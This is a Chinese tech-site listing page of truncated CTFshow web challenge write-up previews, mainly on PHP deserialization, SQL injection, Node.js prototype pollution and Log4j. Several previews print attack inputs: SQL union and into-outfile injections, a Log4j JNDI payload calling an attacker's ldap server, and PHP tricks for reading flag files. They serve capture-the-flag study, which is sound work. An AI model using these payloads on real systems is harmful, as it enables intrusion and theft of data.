E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CTFshow
ctfshow
反序列化 wp
好的,又开了一个新系列,加油~后面只总结我觉得有必要总结的了,如果有什么问题可以留言问我强烈推荐Y4tacker师傅的文章:[CTF]PHP反序列化总结_Y4tacker的博客-CSDN博客_php反序列化ctf,真的挺全了web255payload:username=xxxxxx&password=xxxxxxweb256-257有一个技巧,反序列化的格式可以直接用php生成,就不用手动输入了例
yink12138
·
2023-09-06 19:00
CTF修炼之路
php
web安全
ctfshow
vip题目限免
源码泄露右键查看源代码即可得到flag前台JS绕过解法一URL前面加上view-source:解法二题目描述说禁用js,那就禁用就行然后和前面一样右键查看就行协议头信息泄露提示抓包,那就抓包吧抓包直接就在返回包获得flag了robots后台泄露robots协议也叫君子协议,告诉爬虫不能爬取的内容,把敏感目录写上去容易被黑客利用phps源码泄露直接在url后面加index.phps会自动下载php源
blackK_YC
·
2023-09-06 19:30
网络安全
安全
Ctfshow
反序列化
目录常见的反序列化魔术手法web254web255web256web257web258web259web260web261web262解法一:解法二:web263web264web265web266web267web268web269web270web271web272web273web274web275常见的反序列化魔术手法__wakeup()//执行unserialize()时,先会调用这个函
安好.791
·
2023-09-06 19:00
php
开发语言
CTFSHOW
反序列化
254isVip;}publicfunctionlogin($u,$p){if($this->username===$u&&$this->password===$p){$this->isVip=true;}return$this->isVip;}publicfunctionvipOneKeyGetFlag(){if($this->isVip){global$flag;echo"yourflagis
v2ish1yan
·
2023-09-06 19:30
CTF
WEB
php
python
ctfshow
反序列化2
web263PHP的session反序列化带你走进PHPsession反序列化漏洞-先知社区原理解释不错
CTFshow
-web入门-反序列化_哔哩哔哩_bilibili可参考
CTFshow
反序列化web263
ThnPkm
·
2023-09-06 19:29
刷题
wp
php
PHP
ctf
安全
web
CTFshow
反序列化
目录
CTFshow
反序列化web262-SoapClient类的利用web263-PHPsession反序列化什么是session?
Sn_u
·
2023-09-06 19:29
php
服务器
开发语言
ctfshow
反序列化
web254error_reporting(0);highlight_file(__FILE__);include('flag.php');classctfShowUser{public$username='xxxxxx';public$password='xxxxxx';public$isVip=false;publicfunctioncheckVip(){return$this->isVip;
Msaerati
·
2023-09-06 19:59
java
服务器
php
ctfshow
反序列化Web254-255
2022/4/17反序列化反序列化漏洞的产生主要有以下两个原因:1.unserialize函数的参数可控。2.存在魔法函数。魔法函数__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debu
墨言ink
·
2023-09-06 19:58
web安全
ctfshow
反序列化255-263
webweb255error_reporting(0);highlight_file(__FILE__);include('flag.php');classctfShowUser{public$username='xxxxxx';public$password='xxxxxx';public$isVip=false;publicfunctioncheckVip(){return$this->isV
1-1A0
·
2023-09-06 19:58
CTF
php
javascript
CTFSHOW
反序列化
反序列化为什么要序列化class类实验室成员obj对象(是一种语言结构,一个对象就是一个变量)某一个成员特征(成员变量)性别,姓名。。。。。。方法(动作)思考,听课,下课。。。。。。百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。简单的说,序列化
ing_end
·
2023-09-06 19:28
笔记
web安全
ctfshow
反序列化篇(下)
web267(yii框架)开启靶机,是一个网站,试着搜索有没有重要信息。在这里发现是yii框架。我们使用弱口令admin/admin就可以登录进来了,那就继续收集重要信息。在源代码中发现了重要注释。让我们传一个view-source参数。出现了传参点,百度搜索yii反序列化漏洞,有相关的poc可以直接打。想知道构造思路可以看这篇文章:yii框架反序列化相关poc为:checkAccess='she
XiLitter
·
2023-09-06 19:28
#
web
安全
php
web安全
ctfshow
—反序列化
简介序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。php将数据序列化和反序列化会用到两个函数serialize将对象格式化成有序的字符串unserialize将字符串还原成原来的对象序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。常见的魔术方法__construct(),类的构造函数__destr
Snakin_ya
·
2023-09-06 19:27
刷题记录
php反序列化
CTFshow
反序列化 web262
目录源码思路题解解法一直接构造类进行序列化解法二字符逃逸总结源码from=$f;$this->msg=$m;$this->to=$t;}}$f=$_GET['f'];$m=$_GET['m'];$t=$_GET['t'];if(isset($f)&&isset($m)&&isset($t)){$msg=newmessage($f,$m,$t);$umsg=str_replace('fuck','l
Kradress
·
2023-09-06 19:57
CTFshow
php
安全
开发语言
[CTF]
CTFSHOW
反序列化
265token=$t;$this->password=$p;}publicfunctionlogin(){return$this->token===$this->password;}}$
ctfshow
Sapphire037
·
2023-09-06 19:57
CTF
php
安全
web安全
ctfshow
反序列化
PHP反序列化前置知识序列化和反序列化对象是不能在字节流中传输的,序列化就是把对象转化为字符串以便存储和传输,反序列化就是将字符串转化为对象魔术方法__construct()//构造,当对象new时调用__wakeup()//执行unserialize()时,先会调用这个函数__sleep()//执行serialize()时,先会调用这个函数__destruct()//对象被销毁时触发__call
blackK_YC
·
2023-09-06 19:56
网络安全
ctfshow
—web—Log4j复现
0x00前言CTF加解密合集CTFWeb合集网络安全知识库0x01题目0x02WriteUp这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。log4j的payload是:${jndi:ldap://}这里选取的工具是:JNDIExploit利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:138
Wcbddd
·
2023-09-05 01:20
web
CTF
log4j
ctfshow
—萌新赛—给她
0x00前言CTF加解密合集CTFWeb合集网络安全知识库文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp首先看到访问页面,正常情况下这种都是sql注入,尝试发现被转义了尝试无果之后,扫描目录,发现git目录使用Git_Extract获取一下源码,发现一个hint文件,打开看一下,发现是通过sprintf进行处理的看到sprintf,要了解一个知识点就是php字
Wcbddd
·
2023-09-05 01:19
CTF
web
web安全
安全
CTFshow
菜狗杯 web方向 全
文章目录菜狗杯web签到菜狗杯web2c0me_t0_s1gn菜狗杯我的眼里只有$菜狗杯抽老婆菜狗杯一言既出菜狗杯驷马难追菜狗杯TapTapTap菜狗杯Webshell菜狗杯化零为整菜狗杯无一幸免菜狗杯无一幸免_FIXED菜狗杯传说之下(雾)菜狗杯算力超群菜狗杯算力升级菜狗杯easyPytHon_P菜狗杯遍地飘零菜狗杯茶歇区菜狗杯小舔田?菜狗杯LSB探姬菜狗杯Is_Not_Obfuscate菜狗杯
Jay 17
·
2023-09-03 17:05
CTF赛事
web安全
网络安全
PHP
python
AES
变量覆盖
沙箱逃逸
CTFshow
nodejs
CTFshowNode.jsCTFshowNode.jsweb334web335web336web337md5绕过web338原型链污染web339原型链污染+web340原型链污染++web341原型链污染+++web342原型链污染++++web343原型链污染+++++web344nodejs特性CTFshowNode.jsNode.js是一个基于ChromeV8引擎的Javascript运
Sn_u
·
2023-09-03 06:39
javascript
原型模式
开发语言
web安全
ctfshow
nodejs
前言文档先阅读一遍Node.js教程|菜鸟教程(runoob.com)常见漏洞Node.js常见漏洞学习与总结-先知社区(aliyun.com)nodejs一些入门特性&&实战-先知社区(aliyun.com)原型链污染深入理解JavaScriptPrototype污染攻击|离别歌(leavesongs.com)模板引擎rceXNUCA2019Hardjs题解从原型链污染到RCE-先知社区(ali
Ff.cheng
·
2023-09-03 06:09
笔记
Ctfshow
nodejs
Ctfshownodejsweb334(特性)web335(特性)web336(特性)web337(特性)web338(原型链污染)web339(原型链污染)web340(原型链污染)web341(ejs)web342(jade)web343(jade)web344(特性)web334(特性)login.jsvarexpress=require('express');varrouter=expre
Elitewa
·
2023-09-03 06:32
web安全
CTF
安全
网络
web安全
node.js
e与phi不互素 --- 五 + 1 + 1道题详记
题目描述:题目分析:题四(2022
ctfshow
卷王杯现代密码签到)题目描述:题目分析:有限域开方求解:AMM算法求解:题五题目描述:有限域开方求解:AMM算法求解:浅记一下持续更新中...题六([第三届江西省网络安全大赛
Emmaaaaaaaaaa
·
2023-09-03 04:34
密码RSA
密码学
安全
ctfshow
- web1(50 point)
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp首先映入眼帘的是登录界面尝试弱口令无果,可以注册,尝试注册一个账号通过url发现这里是通过orderby进行了排序,测试发现一共5个字段,并且3是按照密码进行排序http://47060d53-16c1-4edd-a0df-c2d8f0bb636e.challenge.ctf.show/user_main.php?ord
Wcbddd
·
2023-09-02 05:15
CTF
web
web安全
ctfshow
—萌新—杂项1
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUped400fbcff269bd9c65292a97488168a首先这是一个md5,然后在线解密一下,解密站点https://www.somd5.com/解密出来的内容是helloctf然后去掉ctf就是最终的答案结果就是flag{hello}以上,虽然感觉意义不大,但是还是记录一下。咳咳,大家有空可以关注一下我朋友的公
Wcbddd
·
2023-09-02 05:15
CTF
web
安全
ctfshow
web521 报错注入和分段
发现注入点闭合是’发现没有回显,但是因为有报错所以可以报错注入在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。报错注入的原理,在错误信息中执行SQL语句。触发报错的方式有很多,具体细节也不尽相同。此处建议直接背公式。groupby?id=1"and(select1from(selectcount(*),concat(user(),floor(r
blackK_YC
·
2023-09-01 14:04
数据库
CTFshow
175 into outfile ‘/var/www/html/1.txt‘
[x00-x7f]匹配ASCII值从0-127的字符0-127表示单字节字符,也就是:数字,英文字符,半角符号,以及某些控制字符。限制了页面不能显示任何数据,?id=1'unionselect1,passwordfromctfshow_user5intooutfile'/var/www/html/1.txt'--+&page=1&limit=10就跳到这里了,真的很神奇,所以说selectxxxf
王俊凯迷妹
·
2023-08-30 02:10
sql
ctfshow
红包题
前言:最近一直在搞java很少刷题,看见
ctfshow
的活动赶紧来复现一波~
ctfshow
红包挑战7还有佬们给出了这个wp但是没有解释("%0C%08%00%00"^"`{%2f")(""^"`{/")
偶尔躲躲乌云334
·
2023-08-29 07:24
python
前端
php
PHP代码审计 -- 以
ctfshow
php特性 93-104为例
web93(intval()特性)来看源码首先是弱比较(不能等于4476)然后是正则比较不能出现大小写的字母最后就是等于4476;过滤了字母,所以不能用16进制,可以用8进制或者小数绕过/?num=010574或/?num=4476.1web94(intval()特性)来看源码函数分析:strpos()函数返回匹配的字符位置,默认从0开始strpos(string,find,start)strin
0e1G7
·
2023-08-28 04:58
作业
刷题笔记
php
开发语言
安全
经验分享
web安全
ctfshow
-web-红包题第六弹
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp首先跑一下字典,这里用的dirmap,可以看到有一个web.zip下载下来之后发现是一个网站备份,备份的是check.php.bak然后接着看,可以看到这里不太可能是sql注入,有一个请求check.php?token="+token+"&php://input"正好接着上一个文件备份的内容,看一下源码首先token是将
Wcbddd
·
2023-08-27 01:40
CTF
web
前端
ctfshow
-web14
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp首先看到这个,swith,那么直接输入4,则会打印$url的值然后访问一下查看一下,发现完整的请求是http://c7ff9ed6-dccd-4d01-907a-f1c61c016c15.challenge.ctf.show/here_1s_your_f1ag.php?query=1查看注释,发现还有一些内容被处理了:i
Wcbddd
·
2023-08-27 01:09
安全
[
ctfshow
web入门]常用姿势801-806
1NDEX0x00前言801flaskpin码计算谨记!!python3.8和3.6pin码生成方式不同werkzeug版本不同machine-id获取不同python3.8pin码生成要素过一下前一个版本(0.16.1)getmachine-id部分源码werkzeug1.0.0rc1及以后3.6MD53.8sha1实操一下web801802无字母数字命令执行异或法803phar文件包含804p
k_du1t
·
2023-08-26 19:45
ctf
php
web安全
后端
网络安全
[
ctfshow
web入门]常用姿势807-812
1NDEX0x00前言807反弹shellN种姿势808卡临时文件包含CVE-2018-14884穿插一个session.upload_progress809pear文件包含/RCE810SSRF打PHP-FPM811file_put_contents打fpm812PHP-FPM未授权0x02rethink0x00前言接上一篇继续记录ctfshowweb入门常用姿势嗝807反弹shellN种姿势参
k_du1t
·
2023-08-26 19:45
ctf
php
web
后端
网络安全
[
ctfshow
web入门]常用姿势813-816
1NDEX0x00前言813恶意so为什么能绕过disable_function生成恶意so文件1.尝试手工编写(太折磨了)编译扩展2.ext_skel框架开发扩展814为什么劫持getuidphp中哪些函数会产生新进程呢?815构造器劫持利用sendmail劫持getuid的劣势8160x01rethink0x00前言接上一篇继续记录ctfshowweb入门常用姿势嗝813先来看一下php.in
k_du1t
·
2023-08-26 19:45
ctf
php
开发语言
后端
web安全
网络安全
CTFshow
web入门 web316-web333 XSS
XSS我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料,利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式出现多的地方:1、数据交互的地方:
DuxianQAQ
·
2023-08-26 19:13
CTFshow
web入门
前端
web3
xss
CTFSHOW
WEB入门 sql注入 web176-
uNionsElect1,2,passwordfromctfshow_user--+web177过滤空格'-1/**/union/**/select/**/1,username,password/**/from/**/
ctfshow
_user
起名字怎么这么难
·
2023-08-26 19:13
ctfshow-web入门
web安全
ctfshow
web入门 php特性 web108-web112
1.web108strrev()反转字符串ereg存在空字符截断(只会匹配%00前面的字符),这个函数匹配到为true,没有匹配到为false,877为0x36d的十进制数值payload:c=a%007782.web108类可以输出,就是当类被当作字符串执行,会调用__trosting魔术方法,这个类要有这个魔术方法,并且要有返回值才可以输出,这个值要可控classa{public$b;publ
mushangqiujin
·
2023-08-26 19:43
ctfshow通关
前端
php
android
CTFSHOW
PHP特性篇(上篇 89-110)
文章目录web89web90、92、93、94、95web91web96web97web98web99web100、101web102、103104、106web105web107web108web109web110web89if(isset($_GET['num'])){$num=$_GET['num'];if(preg_match("/[0-9]/",$num)){die("nonono!")
yu22x
·
2023-08-26 19:43
CTFSHOW
web入门系列
php
正则表达式
perl
ctfshow
web入门 web103-web107
1.web103和102一样payload:v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.phppostv1=hex2bin2.web104值只要一样就可以了payload:v2=1postv1=13.web105考查的是$$变量覆盖,die可以带出数据,输出一条
mushangqiujin
·
2023-08-26 19:42
ctfshow通关
前端
ctfshow
-红包题第二弹
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp同样,先看一下有没有注释的内容,可以看到有一个cmd的入参执行之后可以看到文件代码,可以看到也是eval,但是中间对大部分的字符串都进行了过滤,留下了一个字母p这里就需要知道一个知识点,php中可以通过对之前的内容进行闭合还有一个知识点就是如果是PHP上传文件的话,会在/tmp下生成一个为phpxxxxxx的文件x为随机
Wcbddd
·
2023-08-26 06:53
CTF
web
web安全
ctfshow
—萌新—web1
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp解法1标准的数字型注入查列名http://cc3ecc3f-8c42-4624-979e-277a51ea85d2.challenge.ctf.show/?id=1%20union%20select%20table_name,column_name,3%20from%20information_schema.column
Wcbddd
·
2023-08-26 06:23
安全
ctfshow
-web13 文件上传
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件可以看到这里的限制条件,大小,以及内容,这里可以使用.user.ini进行上传,具体参考:phpuser.ini详解那么我们先上传.user.iniauto_prepend_file=1.txt然后上传1.txt,尝试使用get,但
Wcbddd
·
2023-08-26 06:52
web
CTF
web安全
CTFshow
限时活动 红包挑战9 详细题解
CTFshow
红包挑战9题目源码开源了。
Jay 17
·
2023-08-26 03:24
CTF-web
网络安全
web安全
PHP
反序列化
绕过wakeup
PDO
session反序列化
ctfshow
web入门58-77绕过disable function
该系列为php中绕过disablefunction的题目下文中写的过xxx(65之前的)表示此题及此题之前的都可以过通过复制,重命名读取php文件内容(函数执行后,访问url/flag.txt)函数:copy()rename()用法:copy("flag.php","flag.txt");//过60rename("flag.php","flag.txt");//过60单一函数读文件内容:函数:fi
yu22x
·
2023-08-25 09:50
CTFSHOW
web入门系列
ctfshow
web 反序列化(web254-278)
知识储备随笔分类-PHP常识PHP中的魔术变量:__sleep()//执行serialize()时,先会调用这个函数__wakeup()//将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过)__construct()//当对象被创建时,会触发进行初始化__destruct()//对象被销毁时触发__toString()://当一个对象被当作字符串使用时触发__call()//在对象上
Yn8rt
·
2023-08-25 05:36
ctfshow
php
[
CTFshow
红包挑战] 红包挑战7 Write up
红包挑战7源码如下然后访问shell.php可以看到已经执行ls/的命令,将命令改为cat/f*,然后访问,获得flag?name=error_log&value=/var/www/html/flag.php&1=%00这里建不要与执行ls命令的文件名相同访问后得到flag师傅们的其他解法payload:/?name=error_log&value=1.php&1=("%0C%08%00%00"^
Leafzzz__
·
2023-08-25 05:34
web刷题
php
web安全
[
CTFshow
红包挑战] 红包挑战8 Write up
红包挑战8源码如下=4.0.1,PHP5,PHP7功能:根据传递的参数创建匿名函数,并为其返回唯一名称。语法:create_function(string$args,string$code)//string$args声明的函数变量部分//string$code执行的方法代码部分函数功能分析:输出:Newanonymousfunction:lambda_1ln(2)+ln(2.71828182845
Leafzzz__
·
2023-08-25 05:34
web刷题
web安全
php
CTFshow
——web入门——反序列化web254-web278 详细Writeup
前言在做题之前先简要总结一下知识点private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为:\x00\*\x00变量名public变量会被序列化为:变量名__sleep()://在对象被序列化之前运行__wakeup()//将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)如果类中同时定义了__unserialize()和__wakeup()两个
Leafzzz__
·
2023-08-25 05:02
CTFshow
反序列化
CTF
web安全
php
php反序列化字符串逃逸学习
文章目录前言反序列化特点反序列化字符串逃逸逃逸后字符串变长web262wp逃逸后字符串变短前言最近在刷
ctfshow
的web入门反序列化题目时,正好遇到了字符串逃逸的问题,就跟着群主的讲解视频和网上大佬的文章来学习一下
Lum1n0us
·
2023-08-23 20:12
web安全
CTF
php
php
基于intval()函数特性的漏洞绕过
前言最近在做
ctfshow
的时候碰到intval()函数,虽然题目比较简单,却发现有很多的绕过手段,所以写下这篇博客进行总结intval()函数函数用于获取变量的整数值。
Sx_zzz
·
2023-08-23 20:41
开发语言
php
web安全
php反序列化--字符串逃逸
php反序列化–字符串逃逸PHP反序列化的字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础)过滤后字符串变多以
ctfshow
-web262
YKingH
·
2023-08-23 20:10
CTF专题
php
安全
web安全
上一页
3
4
5
6
7
8
9
10
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他